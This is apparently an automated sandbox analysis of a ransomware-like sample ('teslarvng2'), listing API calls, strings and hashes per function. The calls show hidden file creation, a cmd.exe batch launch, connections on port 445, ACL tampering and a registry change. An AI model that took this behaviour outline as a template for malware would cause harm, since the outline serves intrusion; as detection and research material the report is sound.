                                                                    • Opcode ID: 94e3e178fdaa3dae7384a48d9db93fe320f9bb900c93038325204901cbcae0c5
                                                                    • Instruction ID: 1b076c9fd51f6ed610d7ceb6dbd83312dedc16de1f77fd53dcc241e0442c709e
                                                                    • Opcode Fuzzy Hash: 94e3e178fdaa3dae7384a48d9db93fe320f9bb900c93038325204901cbcae0c5
                                                                    • Instruction Fuzzy Hash: C5C1F4B0A042099FDF15DFA9CD80BEEBBF8AF59314F14515AE510BB392CB319941CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • --------------------------------, xrefs: 00EA5BFF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                    • String ID: --------------------------------
                                                                    • API String ID: 3943753294-1561565162
                                                                    • Opcode ID: 18b626e4fa8bed6145b65e7cf69075ed859f8a681e6628817046ccc64ef0e71c
                                                                    • Instruction ID: f8e40d6fe370baee2e439c07ed0590b3d802a852fa1c17f6f773e112e83f51b3
                                                                    • Opcode Fuzzy Hash: 18b626e4fa8bed6145b65e7cf69075ed859f8a681e6628817046ccc64ef0e71c
                                                                    • Instruction Fuzzy Hash: 43518C32900A05CFCF10DF64C9859A9B7B4EF0E724B25A4AAE806BF295D731FD45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,teslarvng2), ref: 00E5EE4C
                                                                    • SetFileAttributesW.KERNEL32(?,00000002,teslarvng2), ref: 00E5EEE9
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,teslarvng2.hta,00ED9CA4,teslarvng2), ref: 00E5F01D
                                                                    • WriteFile.KERNEL32(00000000,00F29338,00000007,00000000), ref: 00E5F090
                                                                    • FlushFileBuffers.KERNEL32(00000000), ref: 00E5F097
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E5F09E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$Create$AttributesBuffersCloseDirectoryFlushHandleWrite
                                                                    • String ID: teslarvng2$teslarvng2.hta
                                                                    • API String ID: 4056702882-1654985573
                                                                    • Opcode ID: 983886a22d72f31e4e7d3befea213193b3812e9bdbc3bf0d5f49a1c6f6a959d7
                                                                    • Instruction ID: c917d8d03efe61e7c9ce4cfc2e9c32bdd3aaa2bf2e1a60d13496ea5b4ed8b474
                                                                    • Opcode Fuzzy Hash: 983886a22d72f31e4e7d3befea213193b3812e9bdbc3bf0d5f49a1c6f6a959d7
                                                                    • Instruction Fuzzy Hash: D8914670C14758DEDB04DFA8D849BEEBBB0EF14704F10526AE8117B2E2DBB46649CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Wow64DisableWow64FsRedirection.KERNEL32(?,2B749D79,00000000,00000000), ref: 00E5A370
                                                                    • CreateProcessW.KERNEL32 ref: 00E5A396
                                                                    • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00E5A3A2
                                                                    • CloseHandle.KERNEL32(?), ref: 00E5A3AE
                                                                    • CloseHandle.KERNEL32(?), ref: 00E5A3BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Wow64$CloseHandleRedirection$CreateDisableProcessRevert
                                                                    • String ID: /c c:\windows\logg.bat$c:\windows\system32\cmd.exe
                                                                    • API String ID: 680949609-3400191369
                                                                    • Opcode ID: 41cd43c7ff01e55e278c24af96145130687dd095bcbdec7d087814eddf10bbf4
                                                                    • Instruction ID: 372bf1544ae61bd1a0c41d320f404d3045919ee0002f19e5399c7311839d3402
                                                                    • Opcode Fuzzy Hash: 41cd43c7ff01e55e278c24af96145130687dd095bcbdec7d087814eddf10bbf4
                                                                    • Instruction Fuzzy Hash: 08B13471C146A8CADB20CF64CD45BDDBBB0BF59308F1092D9D85977292EBB41A88CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76C23
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76C45
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76C6D
                                                                    • __Getctype.LIBCPMT ref: 00E76D38
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E76DA1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76DD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                    • String ID: "
                                                                    • API String ID: 1102183713-357034475
                                                                    • Opcode ID: 9f40088f7d15c962db5372054f28de087369862aff78d33f8ef16659437bc4d1
                                                                    • Instruction ID: 14385c354998734cf2137af192acf954604f78befe7c77321735a900e9a0b22e
                                                                    • Opcode Fuzzy Hash: 9f40088f7d15c962db5372054f28de087369862aff78d33f8ef16659437bc4d1
                                                                    • Instruction Fuzzy Hash: A861DBB0D00609CFDB01CF68C941BAEFBB4FF49314F249199D848BB281EB35AA45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81EB0
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81ED2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E81EFA
                                                                    • __Getctype.LIBCPMT ref: 00E81FC5
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E82000
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E82034
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                    • String ID: "
                                                                    • API String ID: 1102183713-357034475
                                                                    • Opcode ID: 33e44bb86f760eaaaf2276d15a79053180176cf5d00b5d8ec0a2ec4f2db28807
                                                                    • Instruction ID: 0ec7fed09106a78eac4730e9bd36eac410f1239d075e9a35a8b3adde8d04325e
                                                                    • Opcode Fuzzy Hash: 33e44bb86f760eaaaf2276d15a79053180176cf5d00b5d8ec0a2ec4f2db28807
                                                                    • Instruction Fuzzy Hash: 5751BAB0D00248DFDB11DF98C941BAEBBF8FF45314F244199D819BB291EB75AA06CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E8715D
                                                                    • inet_addr.WS2_32 ref: 00E87170
                                                                    • htons.WS2_32(000001BD), ref: 00E8717F
                                                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E8719B
                                                                    • connect.WS2_32(00000000,00000010,00000010), ref: 00E871A9
                                                                    • select.WS2_32(00000000,00000001,00000001,00000001,00000004), ref: 00E871EE
                                                                    • closesocket.WS2_32(00000000), ref: 00E871FA
                                                                    • closesocket.WS2_32(00000000), ref: 00E87209
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: closesocket$connecthtonsinet_addrioctlsocketselectsocket
                                                                    • String ID:
                                                                    • API String ID: 739720401-0
                                                                    • Opcode ID: c0a02ddad7bb74232f352a7adc30c0ce7ea5089cbb69f3e8eed26daaca587c3d
                                                                    • Instruction ID: b0124d3c659d677f6de938355a91da15aa84ed5bbd6a30cbc4ec209484191575
                                                                    • Opcode Fuzzy Hash: c0a02ddad7bb74232f352a7adc30c0ce7ea5089cbb69f3e8eed26daaca587c3d
                                                                    • Instruction Fuzzy Hash: B4316BB1C06208AFDB14DFA5DC45FEEBBB8EF04704F10412AF505B6290DBB69949CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E75B6D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E75B8D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E75BB5
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E75CA5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E75CD9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID: "
                                                                    • API String ID: 459529453-357034475
                                                                    • Opcode ID: e852c133322a6e5f5fc17e773fc7d5b7aa3fefc0bb01c244d3dc1aeea1ae953f
                                                                    • Instruction ID: ad98ca29589745570eb244be3a5a64bdfcb0cfbdcd8e8dbbde6ace49736374d1
                                                                    • Opcode Fuzzy Hash: e852c133322a6e5f5fc17e773fc7d5b7aa3fefc0bb01c244d3dc1aeea1ae953f
                                                                    • Instruction Fuzzy Hash: F35187B1900648DFDB11DFA8C940BAEBBF4EF85314F248099D4197B391DBB5AE06CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000008,?), ref: 00E84286
                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,0000012C,00000000,?,?,00000000,00000000), ref: 00E842DB
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E8432F
                                                                    • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?,?,?,00000000,00000000), ref: 00E8439B
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E843AF
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000101,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E843C4
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00E843CD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoNamedSecurity$Token$CloseEntriesHandleInformationOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 793342917-0
                                                                    • Opcode ID: 8e0240df5f8f57e62f32ca69e85923d1ef6ab6101b05bb7e60e123d869f27e7f
                                                                    • Instruction ID: a31e786f03761cb49c3554cf2deed48171ca4bb3064205125a40a47a076d2453
                                                                    • Opcode Fuzzy Hash: 8e0240df5f8f57e62f32ca69e85923d1ef6ab6101b05bb7e60e123d869f27e7f
                                                                    • Instruction Fuzzy Hash: 2F4133B1E41209AFEB209F91DC46FDEBBB9EF05708F101028F6057A2D1D7B669468B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EBE57F: _free.LIBCMT ref: 00EBE5A4
                                                                    • _free.LIBCMT ref: 00EBE881
                                                                      • Part of subcall function 00EB5945: HeapFree.KERNEL32(00000000,00000000,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(?,?,00EBE5A9,?,00000000,?,?,?,00EBE84C,?,00000007,?,?,00EBECFA,?,?), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBE88C
                                                                    • _free.LIBCMT ref: 00EBE897
                                                                    • _free.LIBCMT ref: 00EBE8EB
                                                                    • _free.LIBCMT ref: 00EBE8F6
                                                                    • _free.LIBCMT ref: 00EBE901
                                                                    • _free.LIBCMT ref: 00EBE90C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 5d727d09834e9ec84e5b41e231accd1216db63f096c22a620eeb1b5316b34d2b
                                                                    • Instruction ID: 81f2c74b6f6281d273a7ef4f20c15214529fa6e5d403238a70ff9235704a6fa4
                                                                    • Opcode Fuzzy Hash: 5d727d09834e9ec84e5b41e231accd1216db63f096c22a620eeb1b5316b34d2b
                                                                    • Instruction Fuzzy Hash: 43116A32941B04EAD670FBB0CC07FDB77DCBF41714F401814B2A9B62A2FA24A91496A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00EB75F6
                                                                    • __fassign.LIBCMT ref: 00EB77D5
                                                                    • __fassign.LIBCMT ref: 00EB77F2
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EB783A
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EB787A
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EB7926
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 63fdb78eeee267adf0f736a860e6d307ec735926eb07bf50ee96e3bd691aa924
                                                                    • Instruction ID: 4419a5d304dcf7abbf2ce9566a6a768cb58c843d506854ca7c8fd1f8cf7846bc
                                                                    • Opcode Fuzzy Hash: 63fdb78eeee267adf0f736a860e6d307ec735926eb07bf50ee96e3bd691aa924
                                                                    • Instruction Fuzzy Hash: ECD18E75D082589FCF15CFA8C8809EEBBB5BF89314F28116AE895FB341D731A946CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,?), ref: 00EA7421
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00EA748C
                                                                    • LCMapStringEx.KERNEL32 ref: 00EA74A9
                                                                    • LCMapStringEx.KERNEL32 ref: 00EA74E8
                                                                    • LCMapStringEx.KERNEL32 ref: 00EA7547
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00EA756A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide
                                                                    • String ID:
                                                                    • API String ID: 2829165498-0
                                                                    • Opcode ID: 7658d8b329442d6eaec12005f8d46b37140210a9570bff5df6bfbf7c628e2d86
                                                                    • Instruction ID: 6e8ac975d2807671a0075afd9620ef9e9f6d1d316089ea7db5a9613c3a598875
                                                                    • Opcode Fuzzy Hash: 7658d8b329442d6eaec12005f8d46b37140210a9570bff5df6bfbf7c628e2d86
                                                                    • Instruction Fuzzy Hash: B551FF72A0820AAFEB208F64DC40FAA7BA9EF4A744F104524F951FE160D731ED10DBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76A1D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76A3D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76A65
                                                                    • __Getcoll.LIBCPMT ref: 00E76B23
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E76B6F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76BA3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                    • String ID:
                                                                    • API String ID: 1184649410-0
                                                                    • Opcode ID: a5c3d472f0ec1c1c6b86964a714cacbd9e36c377c3e32e472c068af6a0383688
                                                                    • Instruction ID: f991c685e1d6620f947df4f2a7d8cc519c8d500a93fb440e1b47ec4e9862508d
                                                                    • Opcode Fuzzy Hash: a5c3d472f0ec1c1c6b86964a714cacbd9e36c377c3e32e472c068af6a0383688
                                                                    • Instruction Fuzzy Hash: FD5167B1C00608DFDB11DFA4C941BAEBBB4EF45328F248199D4197B291DB75AE06CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,2B749D79,00000000,00000000,00EC4DD0,000000FF,?,00E8569B), ref: 00E84198
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00E8569B), ref: 00E841A3
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841AC
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841B5
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841BE
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandle$EventObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 2857295742-0
                                                                    • Opcode ID: 293f54a7e6cc4776364f9726f7801080dca9d5e8f64ac4123774abb8b67ce491
                                                                    • Instruction ID: da5c3d98bbe5ff1bcdd58e46c64f97c810bb31ab800be76ccd298560323b9c73
                                                                    • Opcode Fuzzy Hash: 293f54a7e6cc4776364f9726f7801080dca9d5e8f64ac4123774abb8b67ce491
                                                                    • Instruction Fuzzy Hash: 7AF04F32408644EFC7115F96ED09E56BBB5FB08720F04473DF526A2AB0DB3B6819DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6307D
                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00E630FB
                                                                    • RegSetValueExA.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004), ref: 00E6311A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E63123
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateMtx_unlockValue
                                                                    • String ID: EulaAccepted
                                                                    • API String ID: 3740505477-921354838
                                                                    • Opcode ID: 61c583788f5870350c572d305143784c37d33bcf2c0009ecbe1b13a48fc3ffd2
                                                                    • Instruction ID: 73f54030307be3f80e9ba07e0e834a2ad8ee5c24332c7000a98462268244c335
                                                                    • Opcode Fuzzy Hash: 61c583788f5870350c572d305143784c37d33bcf2c0009ecbe1b13a48fc3ffd2
                                                                    • Instruction Fuzzy Hash: C5B17871E002499FDB14CFA8D981BEEFBB4FF58700F209269E511BB281D771AA44CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00EABC28,?,?,00F2B738,00000000,?,00EABD53,00000004,InitializeCriticalSectionEx,00ED00FC,00ED0104,00000000), ref: 00EABBF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: ca3cc49c74a43d9a59ee2e58a19d40d75903a0971edc9e23208786e6a99b36ec
                                                                    • Instruction ID: 9928193ac9a8e4b649136a7ba388ac85c336246a1a61bc0f286d086524ed736a
                                                                    • Opcode Fuzzy Hash: ca3cc49c74a43d9a59ee2e58a19d40d75903a0971edc9e23208786e6a99b36ec
                                                                    • Instruction Fuzzy Hash: 7B110231A06225AFCB224B699C01B9A3394EF0A774F281120E901FF2D5D731FC01CBE0
                                                                    Uniqueness

